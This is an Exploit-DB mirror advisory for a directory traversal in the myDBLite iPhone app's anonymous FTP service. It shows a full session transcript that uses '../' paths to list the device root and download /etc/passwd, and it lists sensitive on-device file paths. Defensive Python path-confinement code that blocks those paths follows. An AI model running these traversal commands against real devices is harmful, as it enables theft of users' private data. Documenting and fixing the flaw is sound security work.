exploit-db-mirror/exploits/ios/remote/16229.txt
# Exploit Title : myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sp@2K, Sunlight, H@ckk3y
# Software Link: http://itunes.apple.com/kr/app/mydb-lite/id335521112?mt=8
# Version: 1.1.10
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is a directory traversal vulnerability in myDBLite: the FTP service the app exposes accepts "../" sequences in CWD and RETR paths, so an anonymous client can list and download files from anywhere on the device's filesystem, not just the app's own directory.
# Exploit testing (FTP session transcript)
C:\>ftp
ftp> open 192.168.0.70 29161
Connected to 192.168.0.70.
220 DiddyDJ FTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User logged in.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.
-rw-r--r-- 1 mobile mobile 429 1??09 10:55 appConfig.plist
-rw-r--r-- 1 mobile mobile 429 1??09 10:55 appConfigInit.plist
-rw-r--r-- 1 mobile mobile 899 1??09 10:55 appData.plist
-rw-r--r-- 1 mobile mobile 899 1??09 10:55 appDataInit.plist
-rw-r--r-- 1 mobile mobile 9859 1??09 10:55 astonmartin.jpg
-rw-r--r-- 1 mobile mobile 20 1??09 10:55 astonmartin.txt
-rw-r--r-- 1 mobile mobile 11128 1??09 10:55 ferrari.jpg
-rw-r--r-- 1 mobile mobile 74 1??09 10:55 ferrari.txt
-rw-r--r-- 1 mobile mobile 32797 1??09 10:55 frey.jpg
-rw-r--r-- 1 mobile mobile 17553 1??09 10:55 porsche.jpg
-rw-r--r-- 1 mobile mobile 111 1??09 10:55 porsche.txt
-rw-r--r-- 1 mobile mobile 422 2??24 15:20 pswd.bkup
-rw-r--r-- 1 mobile mobile 422 2??24 15:21 pswd.plist
-rw-r--r-- 1 mobile mobile 54378 1??09 10:55 schinznach.jpg
drwxr-xr-x 12 mobile mobile 476 1??04 14:43 secret
226 Transfer complete.
ftp: 1044 bytes received in 0.02Seconds 65.25Kbytes/sec.
ftp> cd ../../../../../../
250 CWD command successful.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.
-rwxr-xr-x 40 root admin 30 10??26 01:20 Applications
drwxrwxr-x 1 root admin 68 8??19 04:10 Developer
drwxrwxr-x 24 root admin 884 1??12 12:53 Library
drwxr-xr-x 1 root wheel 102 8??19 04:18 System
-rwxr-xr-x 7 root admin 11 2??23 19:41 User
drwxr-xr-x 59 root wheel 2074 1??13 09:52 bin
drwxr-xr-x 1 root admin 68 10??26 01:19 boot
-rw-r--r-- 1 (null) (null) 638 1??25 15:30 control
drwxrwxr-x 1 root admin 68 8??03 12:41 cores
---------- 1 (null) (null) 0 (null) dev
-rwxr-xr-x 25 root admin 11 8??26 05:20 etc
drwxr-xr-x 1 root admin 68 10??26 01:19 lib
drwxr-xr-x 1 root admin 68 10??26 01:19 mnt
drwxr-xr-x 2 root wheel 136 10??23 15:12 private
drwxr-xr-x 47 root wheel 1666 1??13 09:52 sbin
-rwxr-xr-x 5 root admin 15 8??26 05:20 tmp
drwxr-xr-x 9 root wheel 374 1??13 09:52 usr
-rwxr-xr-x 26 root admin 11 8??26 05:20 var
226 Transfer complete.
ftp: 1128 bytes received in 0.02Seconds 70.50Kbytes/sec.
ftp> get ../../../../../etc/passwd
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.00Seconds 787000.00Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit
221- Data traffic for this session was 0 bytes in 0 files
C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file. Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>
# iPhone internal data locations (reachable through the traversal)
1. Phone book
- /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
2. Safari favorites list
- /private/var/mobile/Library/Safari
3. User's e-mail account information
- /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist
4. IPv4 router information
- /private/var/mobile/Library/Preferences/com.apple.conference.plist
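The fix for this class of bug is to confine every client-supplied path to the server's document root before touching the filesystem. The following Python check is an added example written for this page, not myDBLite's code: `APP_ROOT` is a constructed placeholder for the app's Documents directory, and `replay_advisory_session` feeds the CWD/RETR paths from the transcript above through the check to show which ones a confining server would reject.

```python
import os
import posixpath
from urllib.parse import unquote

# Constructed placeholder: the advisory does not name the app's real
# Documents directory, so this value is illustrative only.
APP_ROOT = "/private/var/mobile/Applications/APP-UUID/Documents"


class TraversalError(ValueError):
    """Client path would leave the FTP server's document root."""


def confine_path(cwd, client_path, root=APP_ROOT):
    """Map an FTP client path (CWD, LIST, RETR ...) onto the server filesystem
    while guaranteeing the result stays under `root`.

    `cwd` is the client's current directory as the client sees it: relative to
    the jail and starting with "/". Escapes raise instead of being silently
    clamped, so they can be logged and alerted on.
    """
    raw = unquote(client_path)                      # decode %2e%2e once
    if "\0" in raw:                                 # NUL truncates C paths
        raise TraversalError("NUL byte in path")
    # A client-absolute path is rooted at the jail, never at the real "/".
    virtual = raw if raw.startswith("/") else posixpath.join(cwd, raw)
    # Drop the virtual "/" so surplus ".." components survive normalisation
    # as a leading "..", which is exactly the escape we want to detect.
    rel = posixpath.normpath(virtual.lstrip("/"))
    if rel == ".." or rel.startswith("../"):
        raise TraversalError(f"path escapes document root: {client_path!r}")
    candidate = root if rel == "." else posixpath.join(root, rel)
    # Resolve symlinks too: a link inside the root pointing outside must not
    # become an escape hatch. realpath() also works for non-existent paths.
    real_root = os.path.realpath(root)
    real = os.path.realpath(candidate)
    if real != real_root and not real.startswith(real_root + "/"):
        raise TraversalError(f"symlink escapes document root: {client_path!r}")
    return real


def replay_advisory_session(root=APP_ROOT):
    """Run the transcript's paths (plus two constructed variants) through the
    check; returns command -> "allowed:<server path>" or "blocked"."""
    session = {
        "CWD ../../../../../../": ("/", "../../../../../../"),
        "RETR ../../../../../etc/passwd": ("/", "../../../../../etc/passwd"),
        "RETR astonmartin.txt": ("/", "astonmartin.txt"),
        "CWD secret": ("/", "secret"),
        "RETR ../ferrari.txt from /secret": ("/secret", "../ferrari.txt"),
        "RETR %2e%2e/%2e%2e/etc/passwd": ("/", "%2e%2e/%2e%2e/etc/passwd"),
    }
    results = {}
    for cmd, (cwd, path) in session.items():
        try:
            results[cmd] = "allowed:" + confine_path(cwd, path, root)
        except TraversalError:
            results[cmd] = "blocked"
    return results
```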